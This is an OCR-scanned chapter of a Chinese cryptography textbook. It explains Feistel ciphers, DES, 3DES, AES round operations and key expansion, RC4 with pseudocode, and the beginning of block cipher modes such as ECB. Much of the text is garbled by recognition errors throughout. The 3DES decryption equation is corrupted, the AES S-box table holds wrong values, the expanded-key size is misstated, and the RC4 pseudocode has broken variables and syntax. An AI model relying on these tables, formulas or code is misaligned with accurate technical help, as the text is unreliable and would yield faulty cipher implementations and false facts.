后 组 合成 密 文 组 。 第 i 轮 迭 代 的 输入 Li 和 Ri 
来 自 于 上 轮 迭 代 的 输出 ， 而 子 密 钥 K 是 由 整个 
密 钥 居 推 导出 的 。 一 般 地 ，K; 不 同 于 KK， 也 互 
不 相同 。 

每 轮 迭 代 都 有 相同 的 结构 。 代 换 作 用 在 数 第 办 
据 的 左 半 部 分 。 它 用 轮 函 数 F 作用 数据 的 右 半 
部 分 后 ， 再 与 左 半 部 分 数据 进行 异 或 (XOR )。 
每 轮 迭 代 的 轮 函数 相同 但 输入 的 子 密 钥 不 同 。 
代 换 之 后 ， 交 换 数据 的 两 半 部 分 完成 置换 。 

Feistel 分 组 密码 结构 是 所 有 对 称 分 组 密码 
使 用 的 最 普遍 的 结构 。 一 般 来 说 ， 对 称 分 组 密 
码 由 一 系列 轮 组 成 ， 每 轮 依据 一 个 密 钥 值 进行 
代 换 和 置换 。 对 称 分 组 密码 的 具体 实现 依赖 于 
以 下 参数 和 特征 : 

e 分 组 长 度 (block size): 分 组 越 长 意味 密 文 (2w 位 】 

者 安全 性 越 高 (其 他 情况 相同 )， 但 是 图 20-1 经 典 Feistel 网 络 


明文 (2w 位 ) 
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会 降低 加 /解密 速度 。128 位 的 分 组 长 度 比较 合理 ， 能 适合 广泛 分 组 密码 的 要 求 。 

e BAKE (key size): 密 钥 较 长 同样 意味 着 安全 性 较 高 ， 但 会 降低 加 /解密 速度 。 通 常 
使 用 的 密 钥 长 度 是 128 位 。 

o 迭代 轮 数 ( number of round): Feistel 密码 的 本 质 在 于 单 轮 不 能 提供 足够 的 安全 性 ， 但 
多 轮 加 密 可 取得 很 高 的 安全 性 。 和 迭代 轮 数 的 典型 值 是 16。 

e 子 密 钥 产生 算法 (subkey generation algorithm): 子 密 钥 产生 越 复杂 ， 密 码 分 析 越 困难 。 

e 轮 函 数 (round function): 同样 ， 轮 函数 越 复杂 ， 抗 攻击 的 能 力 就 越 强 。 

设计 对 称 分 组 密码 还 有 两 个 其 他 方面 的 考虑 ， 

o 快速 软件 加 / 解密 ( fast software encryption/decryption) : 许多 情况 下 ， 加 密 算 法 被 掀 入 

到 应 用 程序 工具 中 ， 而 做 成 硬件 不 太 方 便 。 因 此 ， 算 法 的 执行 速度 很 重要 。 

e 简化 分 析 难 度 (ease of analysis): 尽管 我 们 把 算法 设计 得 尽 可 能 不 易 受 到 密码 分 析 的 攻 
击 ， 但 是 将 算法 设计 得 较 简 单 却 也 有 利于 我 们 进行 分 析 。 也 就 是 说 ， 如 果 算 法 描述 起 
来 简洁 清楚 ， 那 么 分 析 其 脆弱 性 也 就 容易 一 些 ， 因 而 可 以 开发 出 更 强 的 算法 。 不 过 ， 
DES 并 没有 容易 分 析 的 方法 。 

对 称 分 组 密码 的 解密 ， 本 质 上 和 加 密 过 程 一 致 。 其 规则 如 下 : 将 密 文 作为 算法 的 输入 , 但 
需要 逆序 使 用 子 密 钥 K;。 也 就 是 说 ， 第 一 轮 使 用 K,， 第 二 轮 使 用 K,_!， 直 到 最 后 一 轮 使 用 Ki。 
这 是 一 个 很 好 的 特点 ， 因 为 这 意味 着 我 们 不 需要 实现 两 个 算法 : 一 个 用 作 加 密 ， 而 男 一 个 用 作 
解密 。 


20.2 ”数据 加 密 标准 


分 组 密码 是 使 用 最 广泛 的 对 称 加 密 算 法 。 分 组 密码 将 固定 长 度 的 明文 分 组 加 密生 成 与 明文 
分 组 等 长 的 密 文 分 组 。 接 下 来 我 们 将 集中 讨论 三 种 最 重要 的 对 称 分 组 密码 算法 : 数据 加 密 标准 
(DES)、 三 重 DES (3DES) 和 高 级 加 密 标准 (AES). 


20.2.1 数据 加 密 标 准 


使 用 最 广泛 的 加 密 体 制 是 数据 加 密 标准 ( DES)， 它 于 1977 年 被 美国 国家 标准 局 即 现在 的 
国家 标准 和 技术 研究 所 (NIST) 采纳 为 FIPS 46 (数据 加 密 标准 ，1977 年 1 月 )。 这 个 算法 本 身 
被 称 为 数据 加 密 算法 (DEA) 9, 

DES 算法 可 以 如 下 描述 : DES 采用 了 64 位 的 明文 长 度 和 56 位 的 密 钥 长 度 。 更 长 的 明文 
被 分 成 多 个 64 位 的 分 组 。DES 结构 只 是 Feistel 网 络 结构 的 微小 的 变化 ， 如 图 20-1 所 示 。 它 包 
含 16 轮 的 处 理 过 程 ， 由 原始 的 56 位 密 钥 ， 产 生 16 个 子 密 钥 ， 分 别 用 于 每 一 轮 。 

DES 的 解密 过 程 本 质 上 和 加 密 过 程 是 一 样 的 。 规 则 如 下 : 将 密 文 作为 DES 算法 的 输入 ， 
但 是 ， 按 逆序 使 用 子 密 钥 Ko MEW, Ke 用 于 第 1 轮 的 迭代 ，Kis 用 于 第 2 MIAN: 
到 K 用 于 第 16 轮 即 最 后 一 轮 的 迭代 。 


20.2.2 = DES 


=f DES (3DES) 的 标准 化 最 初出 现在 1985 年 的 ANSI 标准 X9.17 中 ， 为 了 把 它 用 于 金 
融 领 域 。1999 年 随 着 FIPS PUB 46-3 的 公布 ， 把 它 合并 为 数据 加 密 标准 (DES) 的 一 部 分 。 
3DES 使 用 三 个 密 钥 执行 三 次 DES 算法 ， 有 具体 运算 过 程 依 照 加 密 - 解密 - 加密 (Encryption- 


O 术语 有 点 混乱 ， 直 到 现在 还 经 常 将 DES Al DEA 互 换 使 用 。 最 近 DES 的 文件 中 包括 这 里 描述 的 DEA 和 接 下 
来 描述 的 三 重 DEA (3DES)。DEA 和 3DES 都 是 DES 的 组 成 部 分 。 最 近 ， 官 方术 语 采 用 了 3DES， 并 把 三 
重 DEA 称 为 三 重 DES， 简 写 为 3DES。 为 了 方便 ， 我 们 将 采用 3DES 的 写法 。 
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Decription-Encryption, EDE) 的 顺序 ( 见 图 20-2a)， 写 成 方程 为 : 
C=E(K3, D( Ko, E(K, P ))) 
其 中 
C 一 密 文 
P= 二 明文 
E[K, 了 ] 二 使 用 密 钥 kK 对 X 加 密 
DIK, 了] 二 使 用 密 钥 KK 对 了 解密 
解密 时 逆序 使 用 这 些 密 钥 简单 地 执行 相同 的 操作 ( 见 图 20-2b): 
P=D(K,, E (Ko, D(K3, C X) 
3DES 加 密 过 程 中 的 第 二 步 使 用 的 解密 没有 密码 方面 的 意义 。 它 的 唯一 好 处 是 让 3DES 的 
使 用 者 能 够 解密 原来 单 重 DES 使 用 者 加 密 的 数据 : 
C=E(K,, D(K, E(Ki, P)))=E [K, P] 
通过 三 个 不 同 的 密 钥 ，3DES 的 有 效 密 钥 长 度 为 168 fiz. FIPS 46-3 同样 允许 使 用 两 个 密 
钥 ， 令 KK 二 K;， 这 样 密 钥 长 度 就 为 112 位 。 


FIPS 46-3 包含 了 下 列 3DES 的 规定 : K, A 
e 3DES 是 FIPS 批准 的 可 选 对 称 加 密 | 
o 使 用 单个 56 位 密 钥 的 原始 DES， a) 加 密 
只 允许 在 以 往 系统 的 标准 下 使 用 ， K, x i 
新 设计 必须 支持 3DES。 l | 
e 鼓励 使 用 以 往 DES 系统 的 政府 机 构 B A 
转换 到 3DES 系统 。 ES eel 
e 预计 3DES 与 高 级 加 密 标准 (AES) vibes 
将 作为 FIPS HEME PREIEAE, JES ee SEREG 
iF 3DES 逐步 过 渡 到 AES. 


容易 看 出 ，3DES 是 一 个 强大 的 算法 ， 因 为 底层 密码 算法 是 DEA，DEA 声称 的 对 基于 其 
算法 的 破译 抗 抵抗 能 力 ，3DES 同样 也 有 。 不 仅 如 此 ， 由 于 168 位 的 密 钥 长 度 ， 穷 举 攻 击 更 没 
有 可 能 。 

最 终 AES 将 取代 3DES， 但 是 这 个 过 程 将 花费 很 多 年 的 时 间 。NIST 预言 在 可 预见 的 将 来 
3DES 仍 将 是 被 批准 使 用 的 算法 (为 美国 政府 所 使 用 )。 


20.3 ”高 级 加 密 标准 


高 级 加 密 标准 ( AES) 作为 一 条 联邦 信息 处 理 标 准 (FIPS 207) 发 布 出 来 。 它 试图 利用 更 
安全 有 效 的 算法 取代 DES 和 3DES。 


20.3.1 算法 综述 


在 AES 中 ,分 组 长 度 为 128 位 ， 密 钥 长 度 可 以 被 指定 为 128、192 或 256 位。 这 里 ， 我 们 
假定 密 钥 长 度 为 128 位 ， 该 长 度 可 能 是 使 用 最 广泛 的 。 

20-3 显示 了 AES 的 完整 结构 。 加 密 算 法 的 输入 分 组 和 解密 算法 的 输入 分 组 均 为 128 
位 。 在 FIPS 197 中 ， 输 入 分 组 是 用 以 字 节 为 单位 的 方 阵 摘 述 的 。 该 分 组 被 复制 到 State 数组 。 
这 个 数组 在 加 密 和 解密 的 每 个 阶段 都 会 被 改变 。 在 执行 了 最 后 的 阶段 后 ，State 被 复制 到 输出 
和 矩阵 中 。 同 样 ，128 位 的 密 钥 也 是 用 以 字 节 为 单位 的 矩阵 描述 的 。 然 后 ， 这 个 密 钥 被 扩展 成 一 


个 子 密 钥 字 的 数组 ; 每 个 字 由 4 个 字 节 组 成 ，128 位 的 密 钥 最 终 扩展 为 44 字 的 序列 。 和 矩阵 中 
字 节 的 排列 顺序 是 按 列 排列 的 。 例 如 ， 加 密 算法 中 每 个 128 位 分 组 输入 的 前 4 个 字 节 被 按 顺 序 
放 在 了 in 和 矩阵 的 第 一 列 ， 接 着 的 4 个 字 节 放 在 第 二 列 ， 以 此 类 推 。 同样 ， 扩 展 密 钥 的 前 4 个 
FH (一 个 字 ) 被 放 在 w 矩阵 的 第 一 列 。 
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图 20-3 AES 的 加 密 和 解密 


接 下 来 的 注释 可 以 帮助 我 们 认识 AES: 

1. AES 结构 的 一 个 显著 特征 是 该 结构 不 是 Feistel 结构 。 回 想 一 下 经 典 的 Feistel 结构 ， 数 
据 分 组 中 的 一 半 被 用 来 修改 数据 分 组 中 的 另 一 半 ， 然 后 交换 这 两 部 分 。AES 没有 使 用 Feistel 
结构 ， 而 是 每 一 轮 使 用 代 换 和 移 位 时 都 并 行 地 处 理 整个 数据 分 组 。 

2. 输入 的 密 钥 被 扩展 成 44 个 32 位 的 字 所 组 成 的 数组 li], A 4 个 不 同 的 字 ( 128 位 ) 作 
为 该 轮 的 轮 密 钥 。 

3. 该 结构 由 4 个 不 同 的 阶段 组 成 ， 包 括 一 个 置换 和 三 个 代 换 。 

© 字 节 代 换 (substitute byte): 使 用 一 个 表 ， 称 为 一 个 S 盒 9， 完 成 分 组 中 的 按 字 节 

代 换 。 
© 行 移 位 (shift row): 一 个 简单 的 用 一 行 代替 另 一 行 的 置换 。 


O RE SARAHS (substitution box) 通常 用 在 对 称 密码 的 描述 中 ， 指 代 “ 表 格 - 查找 ”类 型 的 交换 机 制 
中 使 用 的 表格 。 
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© 列 混 淆 (mix column); SHAS TR, FE —P SAIS RBS A PRL. 

o 轮 密 钥 加 (add round key): 利用 当前 分 组 和 扩展 密 钥 的 一 部 分 进行 按 位 XOR. 

4. 算法 结构 非常 简单 。 对 加 密 和 解密 操作 ， 算 法 由 轮 密 钥 加 开始 ， 接 着 执行 9 轮 迭 代 运 
算 ， 每 轮 都 包含 所 有 4 个 阶段 的 代 换 ， 然 后 执行 只 包含 三 个 阶段 的 第 10 轮 的 运算 。 图 20-4 描 
述 了 包含 整个 加 密 轮 的 结构 。 
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图 20-4 AES 的 一 轮 加 密 过 程 


5. 仅仅 在 轮 密 钥 加 阶段 中 使 用 密 钥 。 由 于 这 个 原因 ， 该 算法 的 开始 和 结束 都 有 轮 密 钥 加 的 
阶段 。 如 果 将 其 他 不 需要 密 钥 的 运算 用 于 算法 的 开始 和 结束 ， 那 么 在 不 需要 知道 密 钥 的 情况 下 
就 能 计算 其 逆 ， 故 不 能 增加 算法 的 安全 性 。 

6. 就 轮 密 钥 加 本 身 来 说 ， 是 不 难 破 译 的 。 而 男 外 三 个 阶段 一 起 提供 了 位 混乱 的 功能 。 因 为 
这 些 阶段 没有 使 用 密 钥 ， 故 就 它们 自身 而 言 ， 并 未 提供 算法 的 安全 性 。 我 们 把 该 算法 看 成 是 一 
个 分 组 的 XOR 加 密 ( 轮 密 钥 加 )， 接 着 对 这 个 分 组 混淆 (其 他 的 三 个 阶段 )， 再 接着 又 是 XOR 
加 密 等 交替 执行 的 操作 。 这 种 方式 非常 有 效 且 非常 安全 。 

7. 每 个 阶段 均 可 逆 。 对 字 节 变换 、 行 移 位 和 列 混 淆 ， 在 解密 算法 中 用 与 它们 相对 应 的 逆 函 
数 。 轮 密 钥 加 的 逆 就 是 用 同样 的 轮 密 钥 和 分 组 相 异 或 。 其 原理 就 是 4 OAO BIB, 

8. 与 大 多 数 分 组 密码 一 样 ， 解 密 算法 是 按 逆序 方式 利用 了 扩展 密 钥 。 然 而 ， 解 密 算法 和 加 
密 算法 不 一 样 。 这 是 由 AES 的 特定 结构 决定 的 。 

9. 一 旦 将 所 有 的 4 个 阶段 求 逆 ， 很 容易 证 明 解 密 的 确 可 以 恢复 原来 的 明文 。 图 20-3 中 加 
窗 和 解密 流程 在 纵向 上 是 相反 的 。 在 每 个 水 平 点 上 (如 图 中 虚线 所 示 )，State 在 加 密 和 解密 中 
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是 一 样 的 。 
10. 加 密 和 解密 过 程 的 最 后 一 轮 只 包含 三 个 阶段 。 这 也 是 由 AES 的 特定 结构 所 决定 的 ， 而 
目 也 是 密码 算法 可 逆 性 所 要 求 的 。 


20.3.2 ”算法 的 细节 


我 们 现在 简单 地 看 一 下 AES 的 更 多 细节 。 更 为 详细 的 描述 可 参见 文献 | STAL17 J. 

字 节 代 换 变换 ( Substitute Byte Transformation) 正 向 字 节 代 换 变换 (forward substitute byte 
transformation, SubBytes) 是 一 个 简单 的 查 表 操 作 。AES 定义 了 一 个 S 盒 ， 它 是 由 16x16 个 
字 节 值 (byte value) 组 成 的 矩阵 ( 见 表 20-2a)， 包 含 了 由 256 个 所 有 可 能 的 8 比特 (位 ) 值 组 
成 的 一 个 排列 。State 中 每 个 字 节 按照 如 下 方式 映射 为 一 个 新 的 字 节 : 把 该 字 贡 的 最 左边 4 位 
作为 行 值 ， 最 右边 4 位 作为 列 值 。 然 后 取出 S 盒 中 对 应 行列 元 素 作 为 8 位 的 输出 值 。 例 如 ， 
十 六 进 制 值 ? {95} 对 应 S 盒 中 的 行 值 9， 列 值 是 5，Ss 盒 中 在 此 位 置 的 值 是 {2A}。 因 此 ，{95} 
被 映射 为 {2A}。 


表 20-2 AES 的 S 盒 
a)SB 





O 在 FIPS PUB 197 中 ,十 六 进 制 数 由 外 加 花 括 号 的 形式 表示 。 这 里 采用 这 种 方式 。 
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( 续 ) 
Theses | I TAIT eye 
5 | 6c | 70 | 48 | so | FD | eD | B9 | Da] se | 15 | 46 | 57 | a7 | sp | 9D | s4 
6 | 90 | ps | aB | 00 | sc | Bc | D3 | oa | F7 | 4 | ss | os | Bs | Bs | 45 | 06 
7 | po | 2c | ie | sr | cal ar | or | 02 | ci | ar | Bp | 03 | on | 13 | 8a | e 
s |a|au | 4 |4 | 67 | pc | ea | 97 | F2 | cr | ce | Fo | Ba |e | 73 

y Lo |% [ac | 4 | 22 |E | ap | 35 | 85 | eo | ro | 37 | es | ic] 75 | De | 6E 
pa | a7 | ri | ta | 71 | 1p | 29 [cs | 89 | oF | Br | 6 | ob | aa] 18 | BE | 1B 
上 SA | FA 





S 盒 的 构造 利用 了 有 限 域 的 性 质 ， | ANNAN ARAL, EEMI PE 
相关 的 详细 介绍 。 

逆向 字 节 代 换 变换 (InvSubBytes) 利用 了 表 20-2b MRAD SA. MUA {2A} 到 道 S 
BP, Hy {95}; 输入 {95} BIS 盒 中 ， 输 出 为 {2A}。 

S 盒 的 设计 是 用 来 抵御 所 谓 的 密码 分 析 攻 击 的 。 特 别 是 ，AES 的 开发 者 试图 设计 输入 位 和 
输出 位 之 间 具 有 较 少 的 相关 性 ， 并 且 输 出 不 能 由 一 个 人 简单 的 输入 函数 捅 述 出 来 。 

行 移 位 变换 正 向 行 移 位 变换 ( ShiftfRows) 中 ，State 的 第 一 行 保持 不 变 。 把 State 的 第 二 
行 循环 左 移 一 个 字 节 ， 对 于 第 三 行 循环 左 移 两 个 字 节 ， 第 四 行 循环 左 移 三 个 字 节 。 下 面 是 行 移 
位 变换 (ShiftRows) 的 一 个 例子 : 





逆向 行 移 位 变换 ( InvShiftRows) 将 后 三 行 执行 相反 方 问 的 移 位 操作 ， 如 第 二 行 回 右 循 环 
一 个 学 节 ， 每 5 

行 移 位 要 比 其 第 一 次 出 现 看 起 来 有 用 得 多 。 这 是 因为 State 和 密码 算法 的 输入 输出 一 样 ， 
是 由 四 个 4 字 节 列 组 成 的 数组 。 因 此 在 加 密 过 程 中 ， 明 文 的 前 四 个 字 节 直接 被 复制 到 State 的 
第 一 列 中 ， 等 等 。 进 一 步 而 言 ， 如 下 面 将 要 看 到 的 那样 ， 轮 密 钥 也 是 逐 列 地 应 用 到 State 上 的 。 
因此 ， 行 移 位 就 是 将 某 个 字 节 从 一 列 移动 到 另 一 列 中 ， 它 的 线性 距离 是 4 字 节 的 倍数 。 同 时 请 
注意 这 个 变换 确保 了 某 列 中 的 4 字 节 被 扩展 到 4 个 不 同 的 列 。 

列 混淆 变换 正 向 列 混淆 变换 (MixColumns) 对 每 列 进行 独立 的 操作 。 每 列 中 的 每 个 字 节 
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被 映射 成 为 一 个 新 值 ， 此 值 是 该 列 中 所 有 4 字 节 值 的 函数 。 该 映射 使 用 了 有 限 域 上 的 方程 ， 下 
面 是 一 个 列 混淆 的 例子 。 





有 的 输出 位 都 依赖 于 所 有 的 输入 位 。 

轮 密 钥 加 变换 正 向 轮 密 钥 加 变换 (AddRoundKey) 中 ，128 位 的 State 按 位 与 128 位 的 轮 
密 钥 进行 异 或 操作 。 我 们 把 这 个 操作 看 成 是 基于 State 的 一 列 中 的 四 个 字 节 与 轮 密 钥 的 一 个 字 
的 列 级 别 (column-level) 操作 ; 我 们 也 能 将 其 视 为 字 节 级 别 ( byte-level) 的 操作 。 下 面 是 轮 密 





第 一 个 矩阵 是 State， 第 二 个 矩阵 是 轮 密 钥 。 

逆向 轮 密 钥 加 变换 与 正 向 轮 密 钥 加 变换 相同 ， 因 为 XOR ( 异 或 ) 操作 是 其 本 身 的 逆 。 

轮 密 钥 加 变换 非常 简单 ， 却 能 影响 State 中 的 每 一 位 。 密 钥 扩 展 的 复杂 性 和 AES 其 他 阶段 
运算 的 复杂 性 ， 确 保 了 该 算法 的 安全 性 。 

AES 密 钥 扩展 AES 密 钥 扩展 算法 输入 值 是 4 字 (16 字 节 ) 密 钥 ,输出 值 是 一 个 44 字 
(156 FE) 的 线性 数组 。 这 足以 为 初始 轮 密 钥 加 阶段 和 算法 中 的 其 他 10 轮 中 的 每 一 轮 提供 4 
字 的 轮 密 钥 。 

密 钥 直接 复制 到 扩展 密 钥 的 前 四 个 字 。 然 后 每 次 用 四 个 字 填 充 扩展 密 钥 数组 的 其 他 部 分 。 
在 扩展 的 密 钥 数组 中 ，w[i] 的 值 依赖 于 w[i-1] 和 四 个 位 置 前 的 w[i-4]。 更 复杂 的 有 限 域 算法 用 
来 产生 扩展 的 密 钥 。 


20.4 流 密码 和 RC4 


分 组 密码 一 次 处 理 输入 的 一 组 元 素 ， 每 组 输入 产生 一 组 输出 。 流 密码 持续 地 处 理 输入 元 
素 ， 随 着 处 理 的 继续 ， 每 次 输出 一 个 元 素 。 尽 管 分 组 密码 已 非常 普遍 ， 但 是 某 些 基于 流 密 码 的 
应 用 也 是 很 受 欢迎 的 。 本 章 的 后 面 我 们 将 给 出 例子 。 本 节 我 们 讨论 一 种 可 能 是 最 流行 的 对 称 流 
密码 一 一 RC4。 首 先 介绍 流 密码 的 结构 ， 然 后 探讨 RC4。 


20.4.1 流 密码 的 结构 


一 个 典型 的 流 密 码 每 次 加 密 一 字 节 的 明文 。 当 然 流 密码 也 可 以 被 设计 为 每 次 操作 一 位 或 者 
大 于 一 个 字 节 的 单元 。 图 2-3b 给 出 了 一 个 典型 的 流 密码 的 结构 。 在 该 结构 中 ， 密 钥 输 入 到 一 
个 伪 随 机 数 发 生 器 ， 该 伪 随 机 数 发 生 器 产生 一 串 随机 的 8 位 数 。 伪 随机 流 就 是 在 不 知道 输入 密 
钥 的 情况 下 不 可 预知 的 流 ， 并 且 具 有 表面 上 的 随机 特征 。 发 生 器 的 输出 称 为 密 钥 流 ， 通 过 与 同 
一 时 刻 一 个 字 节 的 明文 流 进行 异 或 (XOR) 操作 产生 密 钥 流 。 例 如 ， 如 果 发 生 硕 产生 的 下 一 字 
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节 为 01101100， 而 下 一 明文 字 节 为 11001100， 则 得 出 密 文字 节 为 : 
11001100 Hx 
® 01101100 FA HE 
10100000  # x 





解密 需要 使 用 相同 的 伪 随 机 序列 ，; 

10100000  %&x 

® 01101100 密 钥 流 
11001100 明文 
通过 设计 合适 的 伪 随机 数 发 生 器 ， 流 密码 可 以 提供 和 相应 密 钥 长 度 相 当 的 安全 性 。 流 密码 

的 主要 优点 是 ， 其 相对 于 分 组 密码 来 说 ， 往 往 速 度 更 快 而 且 需 要 编写 的 代码 更 少 。 例 如 本 节 介 
绍 的 RC4， 仅 仅 几 行 代码 就 可 实现 。 图 20-5 基于 [SING11] 中 的 结果 ， 对 RC4 与 三 种 常见 的 
对 称 分 组 密码 执行 速度 进行 比较 。 分 组 密码 的 优点 是 可 以 重复 使 用 密 钥 。 然 而 ， 如 果 用 流 密 码 
对 两 个 明文 加 密使 用 相同 的 密 钥 ， 则 密码 分 析 就 会 相当 容易 [DAWS96]。 如 果 对 两 个 密 文 流 进 
行 异 或 ， 得 出 的 结果 就 是 两 个 原始 明文 的 异 或 。 如 果 明 文 仅仅 是 文本 串 ， 如 信用 卡号 或 者 其 他 
已 知 特征 的 字 节 流 ， 则 密码 分 析 极 易 获 得 成 功 。 
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图 20-5 3GHz 处 理 帮 上 对 称 密码 的 性 能 比较 


对 于 需要 对 数据 流 加 解密 的 应 用 ， 比 如 一 个 数据 通信 信道 或 者 网 页 浏览 右 /Web 链 路 ， 流 
密码 就 是 很 好 的 解决 方案 。 而 对 于 处 理 成 块 的 数据 ， 比 如 文件 传输 、 电 子 邮件 和 数据 库 ， 分 组 
密码 则 更 为 适用 。 当 然 ， 在 实际 中 两 种 类 型 的 密码 都 可 用 于 几乎 所 有 的 应 用 。 


20.4.2 RC4 算法 


RC4 是 Ron Rivest 为 RSA 安全 公司 在 1987 年 设计 的 一 种 流 密码 。 它 是 一 个 可 变 密 码 长 
度 (variable-key-size)、 面 向 字 节 (byte-oriented) 操作 的 流 密 码 。 该 算法 以 随机 置换 为 基础 。 
分 析 显 示 该 密码 的 周期 完全 可 能 大 于 10"[ROBS95]。 每 输出 一 个 字 节 的 结果 仅 需 要 8 一 16 条 
机 器 操作 指令 ， 并 且 密 码 在 软件 中 运行 速度 非常 快 。RC4 被 用 于 SSL/TLS (Secure Sockests 
Layer/Transport Layer Security， 安 全 套 接 字 层 / 传输 层 协 议 ) 标准 ， 该 标准 是 为 网 络 浏览 器 和 
服务 器 间 通 信 而 制定 的 。 它 也 应 用 于 作为 IEEE802.11 无 线 局 域 网 标准 的 一 部 分 的 WEP (Wired 
Equivalent Privacy， 有 线 等 效 隐 私 ) 协议 和 更 新 的 WiFi 保 护 访问 (WiFi Protected Aceess, 


WPA) 协议 。RC4 作为 RSA 公司 的 商业 机 密 并 没有 公开 。 直 到 1994 年 9 月 ，RC4 算法 才 通 过 
Crypherpinks 匿名 邮件 列表 匿名 公布 于 Internet 上 。 

RC4 算法 非常 简单 和 易于 描述 : 用 1 一 256 个 字 节 (8 一 2048 位 ) 可 变 长 度 密 钥 初 始 化 一 [620 
个 256 个 字 节 的 状态 矢量 S$，S 的 元 素 记 为 S[0], S[1], …, S[255]。 任何 时 刻 ，S 包含 从 0 一 255 
的 所 有 8 位 数 。 对 于 加 密 和 解密 ， 字 节 大 (图 2-3b) 由 S 中 255 个 元 素 按 一 定 方式 选 出 一 个 元 
素 而 生成 。 每 生成 一 个 的 值 ，S 中 的 元 素 就 被 重 置 一 次 。 

初始 化 S 开始 时 ，S 中 元 素 的 值 被 置 为 按 升 序 从 0 一 255$， 即 S[0]==0, S[1] 三 1, …， 
S[255] 二 255。 同 时 建立 一 个 临时 矢量 T。 如 果 密 钥 K 的 长 度 为 256 字 节 ， 则 将 赋 给 T。 否 
则 ， 若 密 钥 长 度 为 keylen FH, WH K EIRA T 的 前 keylen 个 元 素 ， 并 循环 重复 使 用 K 的 
ERA TH FIRK, HET 的 所 有 元 素 都 被 赋值 。 这 些 操作 可 以 概括 如 下 : 

/* Initialization */ 

for i = 0 te 255 do 

S[i] =i; 

T[i] = K{i mod keylen]; 


然后 用 工 产生 S 的 初始 置换 。 从 S[0] 到 S[255]， 对 每 个 Sli], HA T 和 确定 的 方案 ， 
将 Sli] 置换 为 $ 中 的 另 一 字 节 : 

/* Initial Permutation of S */ 

4 = 0; 

for i = 0 to 255 do 


j = (ï + S[i] + TEi]) mod 256; 
Swap (S[i], S[j]); 


因为 对 S 的 操作 仅仅 是 交换 ， 所 以 唯一 的 效果 就 是 置换 ,S 仍然 包含 所 有 值 为 0 一 255 的 元 素 。 

密 钥 流 的 生成 ”矢量 $ 一 旦 完成 初始 化 ， 就 不 再 使 用 输入 密 钥 。 密 钥 流 的 生成 涉及 所 有 的 
CH Sli], WE Sli], 根据 当前 S 的 值 ， 将 Si] SS 中 另 一 个 字 节 置换 。 当 S[255] 完成 置换 
后 ， 操 作 继续 重复 ， 从 S[0] 开始 : 


/* Stream Generation */ 

i, j = 0; 

while (true) 
i = (i + 1) mod 256; 
7 = (J + S[i]) mod 256; 
Swap (S[iJ, S[j]); 
t = (S[i] + S[j]) mod 256; 
k = S[t) ， 


在 加 密 中 , 将 k ASS FAA eS ak, 在 解密 中 , K k 的 值 与 下 一 密 文字 市 异 或 。 
图 20-6 总 结 了 RC4 的 逻辑 结构 。 | 621 
RC4 的 强度 ”分析 RC4 的 攻击 方法 有 许多 公开 发 表 的 文献 ， 但 没有 哪 种 方法 对 于 攻击 有 
足够 长 度 密 钥 (如 128 位) 的 RC4 有 效 。 值 得 注意 的 是 [FLUH01] 中 的 报告 。 作 者 指出 用 于 为 
802.11 无 线 局 域 网 提供 机 密 性 的 WEP 协议 ， 易 于 受到 一 种 特殊 的 攻击 方法 的 攻击 。 从 本 质 上 
讲 ， 这 个 问题 并 不 在 于 RC4 本 身 ， 而 是 作为 RC4 中 输入 的 密 钥 产生 的 漏洞 。 这 种 特殊 的 攻击 
方法 不 适用 于 其 他 使 用 RC4 的 应 用 ， 通 过 修改 WEP 中 密 钥 产生 的 途径 可 以 避免 这 种 攻击 。 这 
个 问题 恰好 说 明了 设计 一 个 安全 的 系统 的 困难 性 不 仪 包括 密码 编码 洱 数 ， 还 包括 协议 如 何 正 确 
地 使 用 这 些 密 码 编码 函数 。 


440 FORD FBBGHS 





b) S 的 初始 置换 





— j =j + Sfi] 








t = S[i]+S[j] 
c) BHR E 
20-6 RC4 








20.5 “分 组 密码 的 工作 模式 

对 称 分 组 密码 一 次 处 理 一 个 数据 分 组 。 在 DES 和 3DES 中 ， 分 组 的 长 度 为 64 位 。 对 于 更 
长 的 明文 ， 有 必要 将 明文 分 成 64 位 的 分 组 (如 果 需 要 填充 最 后 一 组 )。 为 了 将 分 组 密码 应 用 
于 实际 中 ，NIST SP 800-38A 定义 了 5 种 操作 模式 。 这 些 模式 覆盖 了 几乎 所 有 的 使 用 分 组 密码 
的 应 用 程序 。 可 用 于 包括 3DES 和 AES 在 内 的 任何 分 组 密码 。 表 20-3 对 这 些 模型 做 了 一 个 总 
结 ， 后 面 章 节 会 简单 描述 这 个 模型 。 


表 20-3 分 组 密码 的 工作 模式 


电子 密码 本 (ECB) 用 相同 的 密 钼 分 别 对 64 friom |l EEE e CP 


加 密 算法 的 输入 是 上 一 个 64 位 的 密 文 组 和 下 |。 普通 目的 的 面向 分 组 的 传输 





密码 分 组 链接 (CBC) | 人 fi E ma 
一 次 处 理 输入 的 s 位 。 上 一 个 分 组 密 文 作为 | a. 
密码 反馈 (CFB) 产生 一 个 伪 随 机 数 输出 的 加 密 算法 的 输入 ,该 | ”ar ime 
输出 与 明文 异 或 ， 作 为 下 一 个 分 组 的 输入 
输出 反馈 (OFB) 与 CFB 基本 相同 ， 只 是 加 密 算 法 的 输入 是 上 |o 噪声 通道 上 的 数据 流 的 传输 (如 卫 


一 次 DES 的 输出 星 通信 ) 


计数 器 (CTR) 每 个 明文 组 是 与 加 密 的 计数 器 的 异 或 。 对 每 |。 普通 的 面向 分 组 的 传输 
个 后 续 的 组 ， 计 数 器 是 增加 的 。 用 于 高 速 需求 


20.5.1 电子 密码 本 模式 


最 简单 的 模式 是 电子 密码 本 模式 ， 它 一 次 处 理 b 位 明文 。 每 次 使 用 相同 的 密 钥 加 密 ( 见 
图 2-3a)。 使 用 电子 密码 本 这 个 词 是 因为 对 于 给 定 的 密 钥 ， 任何 5b 位 的 明文 组 只 有 唯一 的 密 文 
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与 之 对 应 ， 所 以 可 以 想象 存在 一 个 很 厚 的 密码 本 ,根据 任 意 b 位 明文 都 可 以 查 到 相应 的 密 文 。 

Æ ECB 中 ， 如 果 一 个 明文 中 相同 的 5 位 分 组 在 消息 之 中 出 现 了 不 止 一 次 ,那么 它 将 会 产 
生 相 同 的 密 文 。 由 于 这 个 原因 ， 对 于 比较 长 的 消息 ，ECB 模式 可 能 是 不 安全 的 。 如 果 消 息 是 
高 度 结构 化 的 ， 那么 密码 分 析 者 就 能 发 现 这 些 规律 。 例 如 ， 夺 已 知 这 段 消 息 总 是 以 某 些 固定 的 
字 和 从 开头， 密码 分 析 者 就 可 以 拥有 大 量 的 明 密 文 对 以 展开 攻击 。 夺 消息 有 重复 的 成 分 ， 且 重复 
